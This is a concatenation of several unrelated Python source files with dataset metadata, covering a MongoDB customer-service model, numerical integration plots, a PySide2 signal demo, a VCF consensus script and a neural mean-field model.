HornerWorker(BaseModel):\n '''\n 客服企业的管理员及后台账号\n '''\n __COLLECTION__ = 'horner_worker'\n\n def __init__(self):\n BaseModel.__init__(self)\n\n self.company_id = Column(STRING)\n self.name = Column(STRING, null=False, length=32)\n self.email = Column(STRING, null=False, length=128)\n self.reg_tm = Column(DATETIME)\n self.reg_ip = Column(STRING, null=False)\n self.pwd = Column(STRING, length=32)\n self.phone = Column(STRING)\n\n def getHornerWaiterId(self):\n '''\n 获取hash后的用户编号\n :return:\n '''\n hh = HornerHashIds()\n return hh.encode(self.id)\n\ndef create_company():\n company = HornerCompany()\n company.name = \"ksg\"\n company.admin = 'caimmy'\n company.desc = 'new seasun'\n r = company.save()\n\n print(r)\n\n\ndef clear_data():\n c = HornerCompany.load_first({'name': 'ksg'})\n c.delete()\n n = HornerWorker().load_first({'name': 'caimmy'})\n n.delete()\n\n print(\"ok\")\n\nif \"__main__\" == __name__:\n sk = HornerServiceSkill()\n sk.name = 'waiter'\n sk.skill_id = '9527'\n sk.desc = 'abcdefghijk'\n\n print(sk)\n\n create_company()\n c = HornerCompany.load_all({'name': 'ksg'})\n print(c)", "sub_path": "models/mongo_store.py", "file_name": "mongo_store.py", "file_ext": "py", "file_size_in_byte": 3188, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 12, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 17, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 17, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 19, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 20, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 21, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 22, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 23, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 24, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 25, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 28, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 35, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 35, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 37, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 37, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 38, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 38, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 39, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 39, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 40, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 42, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 49, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 49, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 51, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 51, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 52, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 52, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 53, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 53, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 55, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 62, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 62, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 64, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 64, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 65, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 65, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 66, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 66, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 67, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 67, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 72, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.BaseModel.__init__", "line_number": 79, "usage_type": "call"}, {"api_name": "orm.mongodb.mongobase.BaseModel", "line_number": 79, "usage_type": "name"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 81, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 81, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 82, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 82, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 83, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 83, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 84, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.DATETIME", "line_number": 84, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 85, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 85, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 86, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 86, "usage_type": "argument"}, {"api_name": "orm.mongodb.mongobase.Column", "line_number": 87, "usage_type": "call"}, {"api_name": "orm.mongodb.model_types.STRING", "line_number": 87, "usage_type": "argument"}, {"api_name": "utils.tools.HornerHashIds", "line_number": 94, "usage_type": "call"}]}
+{"seq_id": "445085940", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef f(y):\n return np.log(y)**2\n\nactual_int = 2*np.log(2)**2 - 4*np.log(2) + 2\n#print actual_int\n\n#N_list = np.arange(10, 1000)\n\n#N_list = [1e1, 1e2, 1e3]\nN_list = [1e1, 1e2, 1e3, 1e4, 1e5, 1e6]\n\nrec_left_err = np.zeros(len(N_list))\nrec_righ_err = np.zeros(len(N_list))\ntrap_err = np.zeros(len(N_list))\n\nfor d, N in enumerate(N_list):\n delta = 1. / N\n x = np.linspace(1, 2, N)\n #print delta, x\n rec_left_areas = np.zeros(len(x))\n rec_righ_areas = np.zeros(len(x))\n trap_areas = np.zeros(len(x))\n\n for c, n in enumerate(x):\n f1 = f(n)\n f2 = f(n+delta)\n\n rec_left = f1 * delta\n rec_left_areas[c] = rec_left\n rec_righ = f2 * delta\n rec_righ_areas[c] = rec_righ\n\n trap = .5*(f1 + f2)*delta\n trap_areas[c] = trap\n\n #print np.sum(rec_areas), np.sum(trap_areas)\n rec_left_err[d] = np.abs( np.sum(rec_left_areas) - actual_int ) / actual_int\n rec_righ_err[d] = np.abs( np.sum(rec_righ_areas) - actual_int ) / actual_int\n trap_err[d] = np.abs( np.sum(trap_areas) - actual_int ) / actual_int\n\n#print actual_int\n\nfig, ax = plt.subplots()\n\nplt.plot(N_list, rec_left_err, label = 'Rectangle Rule (Left)')\nplt.plot(N_list, rec_righ_err, label = 'Rectangle Rule (Right)')\nplt.plot(N_list, trap_err, label = 'Trapezoid Rule')\n\nplt.legend()\n\nplt.grid(linestyle = '--', which = 'both')\n\nplt.xlabel('N', size = 24)\nplt.ylabel(r'$\\epsilon$', rotation = 0, labelpad = 20, size = 24)\n\nplt.xticks(fontsize = 20)\nplt.yticks(fontsize = 20)\n\nplt.legend(prop = {'size': 20})\n\nax.tick_params(labelright = True, labelsize = 20)\n\nax.set_xscale('log')\nax.set_yscale('log')\n\nplt.show()\n", "sub_path": "numerical_integration/compare.py", "file_name": "compare.py", "file_ext": "py", "file_size_in_byte": 1697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.log", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}]}
+{"seq_id": "426863947", "text": "import typing\n\nfrom ..._detail import PolicyCouplerBase\nfrom .._PolicySpec import PolicySpec\n\n\nclass CalcRankAtColumnIndex:\n \"\"\"Functor to provide member function implementation in Policy class.\"\"\"\n\n def __init__(\n self: \"CalcRankAtColumnIndex\",\n policy_spec: typing.Optional[PolicySpec],\n ) -> None:\n pass\n\n def __eq__(self: \"CalcRankAtColumnIndex\", other: typing.Any) -> bool:\n return isinstance(other, self.__class__)\n\n def __call__(\n self: \"CalcRankAtColumnIndex\",\n policy: PolicyCouplerBase,\n index: int,\n num_strata_deposited: int,\n ) -> int:\n \"\"\"After n strata have been deposited, what will the rank of the\n stratum at column index k be?\n\n Enables a HereditaryStratigraphicColumn using this predicate to\n optimize away storage of rank annotations on strata. Takes into the\n account the possibility for in-progress stratum depositions that haven't\n been reflected in num_strata_deposited.\n \"\"\"\n spec = policy.GetSpec()\n\n # upper bound implementation gives the exact number of strata retained\n if index == policy.CalcNumStrataRetainedExact(\n num_strata_deposited,\n ):\n # in-progress deposition case\n return num_strata_deposited\n else:\n return min(\n index * spec.GetFixedResolution(),\n num_strata_deposited - 1,\n )\n", "sub_path": "hstrat/stratum_retention_strategy/stratum_retention_algorithms/fixed_resolution_algo/_scry/_CalcRankAtColumnIndex.py", "file_name": "_CalcRankAtColumnIndex.py", "file_ext": "py", "file_size_in_byte": 1463, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Optional", "line_number": 12, "usage_type": "attribute"}, {"api_name": "_PolicySpec.PolicySpec", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 16, "usage_type": "attribute"}, {"api_name": "_detail.PolicyCouplerBase", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "226426626", "text": "#!/usr/bin/python3\n#coding=utf-8\n\nimport sys\nfrom PySide2.QtWidgets import QApplication\nfrom PySide2.QtCore import QObject, Signal, Slot\n\n# 定义一个带有字符串参数的槽\n@Slot(str)\ndef output(str):\n print(str)\n\nclass Test(QObject):\n\t# 自定义一个信号\n output_str = Signal(str)\n\noutput_key = Test()\noutput_key.output_str.connect(output)\n# 发射信号\noutput_key.output_str.emit(\"Signal emit with para\")\n\napp = QApplication(sys.argv)\napp.exec_()\n", "sub_path": "信号槽示例/demo2.py", "file_name": "demo2.py", "file_ext": "py", "file_size_in_byte": 467, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "PySide2.QtCore.Slot", "line_number": 9, "usage_type": "call"}, {"api_name": "PySide2.QtCore.QObject", "line_number": 13, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Signal", "line_number": 15, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}]}
+{"seq_id": "11034699", "text": "# __author__ = Chen Meiying\n# -*- coding: utf-8 -*-\n# 2019/3/20 10:40\n\nfrom main_entry.process import train, predict, load_sample_data, evaluate_strategy, build_strategy\nimport matplotlib.pyplot as plt\nfrom main_entry.Para import Para\nfrom sklearn import clone\npara = Para()\nfrom regressors import Ridge_init, RFR_init, SVR_init, DTR_init, ExtraTreeR_init, RFR_init, GBoostR_init\n\nif __name__ == '__main__':\n # 1. 加载train/cv set数据\n X_in_sample, y_in_sample = load_sample_data.load_regress()\n X_train, X_cv, y_train, y_cv, *args = load_sample_data.preprocess(X_in_sample, y_in_sample)\n print(\"X_train shape, y_train shape:\", X_train.shape, y_train.shape)\n print(\"X_cv shape, y_cv shape:\", X_cv.shape,y_cv.shape)\n\n # 2. 初始化模型\n inits = [GBoostR_init.init()]\n\n for init in inits:\n model_name = init[1]\n\n # 3. 训练模型,保存模型\n model = train.train_regress(clone(init[0]), model_name, X_train, X_cv, y_train, y_cv)\n\n # 4. 模型预测,保存预测结果\n n_days_in_test = predict.predict_regress(model, model_name)\n\n # 5. 策略构建\n build_strategy.add_next_day_return(model_name)\n strategy = build_strategy.build(n_days_in_test, model_name)\n\n # 6. 策略评价\n evaluate_strategy.evaluate(strategy, n_days_in_test)\n\n # 其他\n # print(svm.SVC().get_params().keys()) # 查看模型需要的参数\n # model = joblib.load( para.path_results + \"model.m\") # 模型加载", "sub_path": "mlmodels/main_entry/main_r.py", "file_name": "main_r.py", "file_ext": "py", "file_size_in_byte": 1506, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "main_entry.Para.Para", "line_number": 9, "usage_type": "call"}, {"api_name": "main_entry.process.load_sample_data.load_regress", "line_number": 14, "usage_type": "call"}, {"api_name": "main_entry.process.load_sample_data", "line_number": 14, "usage_type": "name"}, {"api_name": "main_entry.process.load_sample_data.preprocess", "line_number": 15, "usage_type": "call"}, {"api_name": "main_entry.process.load_sample_data", "line_number": 15, "usage_type": "name"}, {"api_name": "regressors.GBoostR_init.init", "line_number": 20, "usage_type": "call"}, {"api_name": "regressors.GBoostR_init", "line_number": 20, "usage_type": "name"}, {"api_name": "main_entry.process.train.train_regress", "line_number": 26, "usage_type": "call"}, {"api_name": "main_entry.process.train", "line_number": 26, "usage_type": "name"}, {"api_name": "sklearn.clone", "line_number": 26, "usage_type": "call"}, {"api_name": "main_entry.process.predict.predict_regress", "line_number": 29, "usage_type": "call"}, {"api_name": "main_entry.process.predict", "line_number": 29, "usage_type": "name"}, {"api_name": "main_entry.process.build_strategy.add_next_day_return", "line_number": 32, "usage_type": "call"}, {"api_name": "main_entry.process.build_strategy", "line_number": 32, "usage_type": "name"}, {"api_name": "main_entry.process.build_strategy.build", "line_number": 33, "usage_type": "call"}, {"api_name": "main_entry.process.build_strategy", "line_number": 33, "usage_type": "name"}, {"api_name": "main_entry.process.evaluate_strategy.evaluate", "line_number": 36, "usage_type": "call"}, {"api_name": "main_entry.process.evaluate_strategy", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "820557", "text": "#!/usr/bin/env python\nfrom Bio import SeqIO\nimport sys\nimport vcf\nimport subprocess\nfrom collections import defaultdict\nimport os.path\nimport argparse\nimport pathlib\n# This script was modified from the Artic-EBOV repo http://artic.network/ebov/ebov-it-setup.html\n\n\ndef collect_depths(bamfile):\n if not os.path.exists(bamfile):\n raise SystemExit(\"bamfile %s doesn't exist\" % (bamfile,))\n\n p = subprocess.Popen(['samtools', 'depth', bamfile], stdout=subprocess.PIPE)\n out, err = p.communicate()\n depths = defaultdict(dict)\n for ln in out.decode('utf-8').split(\"\\n\"):\n if ln:\n contig, pos, depth = ln.split(\"\\t\")\n depths[contig][int(pos)] = int(depth)\n\n return depths\n\n\ndef report(r, status, allele, vcffile):\n idfile = os.path.basename(vcffile).split(\".\")[0]\n print(\"%s\\t%s\\tstatus\\t%s\" % (idfile, r.POS, status))\n print(\"%s\\t%s\\tdepth\\t%s\" % (idfile, r.POS, r.INFO.get('TotalReads', ['n/a'])))\n print(\"%s\\t%s\\tbasecalledfrac\\t%s\" % (idfile, r.POS, r.INFO.get('BaseCalledFraction', ['n/a'])))\n print(\"%s\\t%s\\tsupportfrac\\t%s\" % (idfile, r.POS, r.INFO.get('SupportFraction', ['n/a'])))\n print(\"%s\\t%s\\tallele\\t%s\" % (idfile, r.POS, allele))\n print(\"%s\\t%s\\tref\\t%s\" % (idfile, r.POS, r.REF))\n\n\ndef main(reference, vcffile, bamfile, sample_name, depth_threshold, quality_threshold):\n masked_positions = []\n bamfile = pathlib.Path(bamfile).absolute()\n reference = pathlib.Path(reference).absolute()\n vcffile = pathlib.Path(vcffile).absolute()\n outfile = pathlib.Path(bamfile.parent, sample_name + \"_consensus_artic.fasta\")\n depths = collect_depths(bamfile)\n seq = list(SeqIO.parse(open(str(reference)), \"fasta\"))[0]\n cons = list(seq.seq)\n\n for n, c in enumerate(cons):\n try:\n depth = depths[seq.id][n+1]\n except KeyError:\n depth = 0\n\n if depth < depth_threshold:\n cons[n] = 'N'\n\n for mask in masked_positions:\n cons[mask-1] = 'N'\n\n sett = set()\n vcf_reader = vcf.Reader(open(str(vcffile), 'r'))\n for record in vcf_reader:\n if record.ALT[0] != '.':\n # variant call\n if record.POS in masked_positions:\n #report(record, \"masked_manual\", \"n\", vcffile)\n continue\n\n # commented out: primers removed with bamclipper\n # if 'PRIMER' in record.INFO:\n # report(record, \"primer_binding_site\", \"n\")\n # cons[record.POS-1] = 'N'\n # continue\n\n # support = float(record.INFO['SupportFraction'])\n total_reads = int(record.INFO['TotalReads'])\n qual = record.QUAL\n ref = record.REF\n alt = str(record.ALT[0])\n\n if qual >= quality_threshold and total_reads >= depth_threshold:\n if len(ref) > len(alt):\n print(f\"gap-masking confident deletion at {record.POS}\")\n for n in range(len(ref)):\n cons[record.POS-1+n] = '-'\n continue\n elif len(alt) > len(ref):\n for i, n in enumerate(alt[::-1]):\n cons.insert(record.POS - 1, n)\n print(f\"adding insertion at position: {record.POS}\")\n continue\n else:\n cons[record.POS - 1] = str(alt)\n print(f\"assigning variant call at {record.POS}\")\n\n #report(record, \"variant\", alt, vcffile)\n sett.add(record.POS)\n\n elif len(ref) > len(alt):\n continue\n else:\n # report(record, \"low_qual_variant\", \"n\", vcffile)\n #cons[record.POS-1] = 'N'\n continue\n\n with open(outfile, 'w') as handle:\n handle.write(f\">{sample_name}\\n{''.join(cons)}\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"make consensus from vcf and bam file\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"-r\", \"--reference\", type=str, default=argparse.SUPPRESS,\n help=\"The reference genome and primer scheme to use\", required=True)\n parser.add_argument(\"-v\", \"--vcf_file\", type=str, default=argparse.SUPPRESS,\n help=\"The path and name of the vcf file\", required=True)\n parser.add_argument(\"-b\", \"--bam_file\", default=argparse.SUPPRESS, type=str,\n help=\"The path and name of the sorted, trimmed bam file\", required=True)\n parser.add_argument(\"-n\", \"--sample_name\", type=str, default=argparse.SUPPRESS,\n help=\"The sample name\", required=True)\n parser.add_argument(\"-d\", \"--depth_threshold\", type=int, default=10,\n help=\"The minimum coverage allowed to call variants as real\", required=True)\n parser.add_argument(\"-q\", \"--quality_threshold\", type=int, default=10,\n help=\"The minimum Q score to allowed to call variants as real\", required=True)\n\n args = parser.parse_args()\n\n bam_file = args.bam_file\n reference = args.reference\n vcf_file = args.vcf_file\n sample_name = args.sample_name\n depth_threshold = args.depth_threshold\n quality_threshold = args.quality_threshold\n\n main(reference, vcf_file, bam_file, sample_name, depth_threshold, quality_threshold)\n", "sub_path": "src/margin_cons.py", "file_name": "margin_cons.py", "file_ext": "py", "file_size_in_byte": 5436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.path.path.exists", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 14, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 17, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 17, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.path.basename", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 29, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 40, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 41, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 42, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "Bio.SeqIO.parse", "line_number": 45, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 45, "usage_type": "name"}, {"api_name": "vcf.Reader", "line_number": 61, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 111, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 112, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 113, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 115, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 117, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 119, "usage_type": "attribute"}]}
+{"seq_id": "261175323", "text": "#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### \n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### \n\n#### code for the mf of one balanced population with low rank xi: \n\n#### CODE 1a: spontaneous activity in rank-one networks: DMF theory (related to Fig. 1C)\n#### This code computes the DMF solutions (and their stability) for increasing values of the random strength g\n#### The overlap direction is defined along the unitary direction (rho = 0, see Methods)\n#### Within the DMF theory, activity is then described in terms of mean (mu) and variance (delta) of x\n\n#### Note that the Data/ folder is empty to begin; this code needs to be run with the flag doCompute = 1\n#### at least once\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### \n### Import functions\n\nimport sys\nfrom importlib import reload\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random as rand\n\nimport fct_integrals as integ\nimport fct_facilities as fac\nimport fct_mf as mf\n\nimport constants as gv\nreload(gv)\n\n#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### \n# We solve separately the DMF equations corresponding to stationary and chaotic states\n\nJ0_list = []\nkappa_list = []\nsigma_0_list = []\nrate_list = []\n\nfor gv.J0 in np.linspace(.001,1.26,200):\n y0 = [rand.random() for i in range(0,2)]\n sol = mf.SolveStaticNonZero(y0)\n\n u = sol[0]\n delta_0 = sol[1]\n \n kappa = mf.overlap(u,delta_0)\n sigma_0 = mf.variance(u,delta_0)\n rate = mf.mean_rate(u, delta_0)\n \n J0_list.append(gv.J0)\n kappa_list.append(kappa) \n sigma_0_list.append(sigma_0)\n rate_list.append(rate)\n\nfor gv.J0 in np.linspace(1.26,1.8,200):\n y0 = [rand.random() for i in range(0,2)]\n sol = mf.SolveStaticZero(y0)\n\n u = sol[0]\n delta_0 = sol[1]\n \n kappa = mf.overlap(u,delta_0)\n sigma_0 = mf.variance(u,delta_0)\n rate = mf.mean_rate(u, delta_0)\n \n J0_list.append(gv.J0)\n kappa_list.append(kappa) \n sigma_0_list.append(sigma_0)\n rate_list.append(rate)\n\nkappas_neg = [-abs(i) for i in kappa_list]\n\nfac.SetPlotParams()\n\nplt.figure('kappa Vs J0')\n# ax0 = plt.axes(frameon=True)\n\nplt.xlabel('$J_0$')\nplt.ylabel('$\\kappa$')\n\nplt.plot(J0_list, kappa_list,'-k')\nplt.plot(J0_list, kappas_neg,'-k')\n\n# ax0.spines['top'].set_visible(False)\n# ax0.spines['right'].set_visible(False)\n# ax0.yaxis.set_ticks_position('left')\n# ax0.xaxis.set_ticks_position('bottom')\n\nplt.savefig('balance_kappaVsJ0.svg',format='svg')\n\nplt.figure('sigma0 Vs J0')\nplt.xlabel('$J_0$')\nplt.ylabel('$\\sigma_0$')\n\nplt.plot(J0_list, sigma_0_list,'-k')\n\nplt.savefig('balance_sigma0VsJ0.svg',format='svg')\n\nplt.figure('r0 Vs J0')\nplt.xlabel('$J_0$')\nplt.ylabel('$r_0$')\n\nplt.plot(J0_list, rate_list,'-k')\nplt.savefig('balance_r0VsJ0.svg',format='svg')\n\n", "sub_path": "python/rate_model/low_rank/balance/main_mf.py", "file_name": "main_mf.py", "file_ext": "py", "file_size_in_byte": 2935, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "importlib.reload", "line_number": 29, "usage_type": "call"}, {"api_name": "constants.J0", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 39, "usage_type": "call"}, {"api_name": "random.random", "line_number": 40, "usage_type": "call"}, {"api_name": "fct_mf.SolveStaticNonZero", "line_number": 41, "usage_type": "call"}, {"api_name": "fct_mf.overlap", "line_number": 46, "usage_type": "call"}, {"api_name": "fct_mf.variance", "line_number": 47, "usage_type": "call"}, {"api_name": "fct_mf.mean_rate", "line_number": 48, "usage_type": "call"}, {"api_name": "constants.J0", "line_number": 50, "usage_type": "attribute"}, {"api_name": "constants.J0", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 55, "usage_type": "call"}, {"api_name": "random.random", "line_number": 56, "usage_type": "call"}, {"api_name": "fct_mf.SolveStaticZero", "line_number": 57, "usage_type": "call"}, {"api_name": "fct_mf.overlap", "line_number": 62, "usage_type": "call"}, {"api_name": "fct_mf.variance", "line_number": 63, "usage_type": "call"}, {"api_name": "fct_mf.mean_rate", "line_number": 64, "usage_type": "call"}, {"api_name": "constants.J0", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fct_facilities.SetPlotParams", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": 